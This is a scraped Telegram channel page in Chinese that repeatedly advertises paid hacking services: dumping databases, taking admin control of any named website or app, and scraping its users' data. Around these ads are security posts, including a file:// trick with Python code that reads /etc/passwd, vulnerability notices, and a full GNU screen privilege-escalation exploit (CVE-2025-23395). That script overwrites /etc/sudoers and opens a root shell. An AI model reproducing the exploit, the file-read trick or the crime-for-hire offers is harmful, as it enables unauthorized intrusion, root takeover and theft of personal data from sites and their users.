This media is not supported in your browser
VIEW IN TELEGRAM
承接各种指定网站或者APP
脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、
业务合作: @YaMaa8
脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、
(需要请行渗透或者爬取指定网站用户数据的请准备好网站或者APP、包括你的要求跟需要爬取到哪些信息在内、)
(还有就是网站不是我家开的、想什么时候进去就什么时候进去、需要花费很多时间收集网站信息的、然后进行不同漏洞点方式去研究得到数据、诚信合作、合作共赢、
业务合作: @YaMaa8
This media is not supported in your browser
VIEW IN TELEGRAM
承接各种指定网站或者APP
脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、
业务合作: @YaMaa8
脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、
(需要请行渗透或者爬取指定网站用户数据的请准备好网站或者APP、包括你的要求跟需要爬取到哪些信息在内、)
(还有就是网站不是我家开的、想什么时候进去就什么时候进去、需要花费很多时间收集网站信息的、然后进行不同漏洞点方式去研究得到数据、诚信合作、合作共赢、
业务合作: @YaMaa8
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
承接各种指定网站或者APP
脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、
业务合作: @YaMaa8
脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、
(需要请行渗透或者爬取指定网站用户数据的请准备好网站或者APP、包括你的要求跟需要爬取到哪些信息在内、)
(还有就是网站不是我家开的、想什么时候进去就什么时候进去、需要花费很多时间收集网站信息的、然后进行不同漏洞点方式去研究得到数据、诚信合作、合作共赢、
业务合作: @YaMaa8
关于这个问题有很多答案,但我将重点介绍在日常生活中最常用的几种:
⬜️ 应用程序:
通过应用程序,我们可以在设备之间传输各种数据,并访问共享资源。
⬜️ 网络资源:
例如,办公室使用的网络打印机,或者安保人员在远程位置监控的网络摄像头。
⬜️ 存储:
通过连接到网络的服务器或工作站,可以创建可供他人访问的存储空间。许多人会将自己的文件、视频、图片上传到那里,并允许其他用户访问这些内容。
⬜️ 备份:
在大型公司中,通常会使用中央服务器,所有计算机都会将重要文件复制到那里进行备份。
⬜️ VoIP:
基于IP协议的电话服务。目前,VoIP已被广泛应用,因为它比传统电话更简单、更便宜,并且每年都在逐渐取代传统电话。
#网络 |
通过应用程序,我们可以在设备之间传输各种数据,并访问共享资源。
例如,办公室使用的网络打印机,或者安保人员在远程位置监控的网络摄像头。
通过连接到网络的服务器或工作站,可以创建可供他人访问的存储空间。许多人会将自己的文件、视频、图片上传到那里,并允许其他用户访问这些内容。
在大型公司中,通常会使用中央服务器,所有计算机都会将重要文件复制到那里进行备份。
基于IP协议的电话服务。目前,VoIP已被广泛应用,因为它比传统电话更简单、更便宜,并且每年都在逐渐取代传统电话。
#网络 |
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
承接各种指定网站或者APP
脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、
业务合作: @YaMaa8
脱库或者拿后台权限、各类数据后台渗透、支持后台或者数据库、
(需要请行渗透或者爬取指定网站用户数据的请准备好网站或者APP、包括你的要求跟需要爬取到哪些信息在内、)
(还有就是网站不是我家开的、想什么时候进去就什么时候进去、需要花费很多时间收集网站信息的、然后进行不同漏洞点方式去研究得到数据、诚信合作、合作共赢、
业务合作: @YaMaa8
file://localhost/etc/passwd 会返回什么?
是的,会返回/etc/passwd。
在 RFC 8089 中,正确的格式 被描述为
file://<host>/<path>,而 LFR 上的所有漏洞利用都只提到了 file:///<path>而且,在
<host> 中可以输入 域名。系统会解析它,如果指向 127.0.0.1,则会返回文件内容。否则,你只会得到 DNS 的响应。Python 继续
from urllib.request import urlopen
content = urlopen(
"file://yoogle.com/etc/passwd", timeout=2,
).read().decode('utf-8')
print(content)
业务合作: @YaMaa8
🚨 发现 4 个高危 远程代码执行 (RCE) 漏洞,存在于由第三方开发者“Sotbit”开发的 Bitrix CMS 模块 中。
再次出现不安全的序列化问题。这些插件漏洞与输入数据验证不足有关。利用这些漏洞可能允许攻击者远程执行任意代码。已存在利用代码,并且正在被积极使用。开发者建议升级到最新版本,或应用 补丁。
受影响的插件列表:
⚫️ Sotbit: Origami (已下线,版本 14.1.0 及更早版本)
⚫️ Sotbit: 增强型评论 (版本 1.4.1 及更早版本)
⚫️ Sotbit: 快速在可视化编辑器中上传图片
⚫️ Sotbit: 多区域支持
⚫️ Sotbit: 内容解析器
严重程度:8.8/10 (CVSS 3.0)
业务合作: @YaMaa8
再次出现不安全的序列化问题。这些插件漏洞与输入数据验证不足有关。利用这些漏洞可能允许攻击者远程执行任意代码。已存在利用代码,并且正在被积极使用。开发者建议升级到最新版本,或应用 补丁。
受影响的插件列表:
严重程度:8.8/10 (CVSS 3.0)
业务合作: @YaMaa8
Please open Telegram to view this post
VIEW IN TELEGRAM
GNU screen 漏洞,允许以 root 权限执行代码 (CVE-2025-23395)
该漏洞源于以下原因:当以 root 权限启动时,`logfile_reopen()` 函数在权限降级之前执行,但它处理的数据是在当前非特权用户的上下文中,该用户启动了 screen。值得注意的是,初始日志文件的打开操作会正确地进行权限降级,但当再次打开日志文件时,权限降级操作不会执行。
利用方法:
业务合作: @YaMaa8
该漏洞源于以下原因:当以 root 权限启动时,`logfile_reopen()` 函数在权限降级之前执行,但它处理的数据是在当前非特权用户的上下文中,该用户启动了 screen。值得注意的是,初始日志文件的打开操作会正确地进行权限降级,但当再次打开日志文件时,权限降级操作不会执行。
利用方法:
#!/bin/sh
# screen CVE-2025-23395 漏洞利用
# blablabla
# blasty
F=$(mktemp)
L=$HOME/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] 启动 GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] 日志文件已出现,开始利用"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ]; then
echo "[+] 成功,我们搞定了"
sudo sh
else
echo "[-] 漏洞利用失败 :("
fi
rm -rf $F $L
业务合作: @YaMaa8
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2025-22828
在 Apache CloudStack 4.16.0 及更高版本中,发现了一个访问控制漏洞,该漏洞允许了解资源 UUID 的用户读取或添加评论(标注)到他们没有访问权限的资源上。
业务合作: @YaMaa8
在 Apache CloudStack 4.16.0 及更高版本中,发现了一个访问控制漏洞,该漏洞允许了解资源 UUID 的用户读取或添加评论(标注)到他们没有访问权限的资源上。
业务合作: @YaMaa8
有时,在渗透测试过程中,需要确定网站的真实IP地址,而这个地址可能被Web应用防火墙(WAF)或其他安全机制隐藏。
一个经常被忽略的技巧是,简单地获取一封邮件。
当然,首先需要找到发送邮件的功能。这可能是注册确认、密码重置通知、订阅广告邮件等等,并不重要。最重要的是收到一封邮件。
收到邮件后,点击“显示原始邮件”,然后就可以查看发件人的IP地址。
业务合作: @YaMaa8
一个经常被忽略的技巧是,简单地获取一封邮件。
当然,首先需要找到发送邮件的功能。这可能是注册确认、密码重置通知、订阅广告邮件等等,并不重要。最重要的是收到一封邮件。
收到邮件后,点击“显示原始邮件”,然后就可以查看发件人的IP地址。
业务合作: @YaMaa8